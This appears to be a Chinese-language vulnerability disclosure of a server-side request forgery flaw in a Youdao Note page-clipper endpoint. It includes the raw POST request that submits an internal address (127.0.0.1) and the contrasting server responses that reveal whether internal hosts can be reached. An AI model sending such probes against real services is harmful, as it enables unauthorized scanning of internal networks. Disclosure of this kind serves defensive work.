漏洞地址:http://note.youdao.com/memory/?url=http://www.wooyun.org(如需登陸,請註冊登陸)javascript
正文預覽的地方會讀取URL地址的
<meta name="description" content=""/>
content的內容做爲顯示
跟蹤起網頁的跳轉到達
POST /yws/open/memory?method=content HTTP/1.1
Host: note.youdao.com
Proxy-Connection: keep-alive
Content-Length: 20
Accept: application/json, text/javascript, */*
Origin: http://note.youdao.com
X-Requested-With: XMLHttpRequest
Cookie:2881064151
url=http://127.0.0.1
(參數作了精減,請自行抓包)
根據URL地址的可不可到達 結果相似以下
到達:
HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 14 Jan 2015 15:38:44 GMT
Content-Type: text/json; charset=UTF-8
Content-Length: 41
Connection: close
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
Cache-Control: no-cache
{"content":"","title":null,"type":"NONE"}
(如又content內網,會顯示內容,沒有內容可地址存在就是這個狀況,可測試www.wooyun.org--有content www.baidu.com--沒有content)
若不可到達:
HTTP/1.1 500 Internal Server Error
Server: Tengine
Date: Thu, 15 Jan 2015 00:57:34 GMT
Content-Type: text/json; charset=UTF-8
Content-Length: 157
Connection: close
RES-CODE: 213
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
{"message":"Message[DATA_TRANSMISSION_FAILURE]: Page Clipper Exception, URL=http://127.0.0.1","canTryAgain":false,"scope":"PREVIOUS_EXCEPTION","error":"213"}java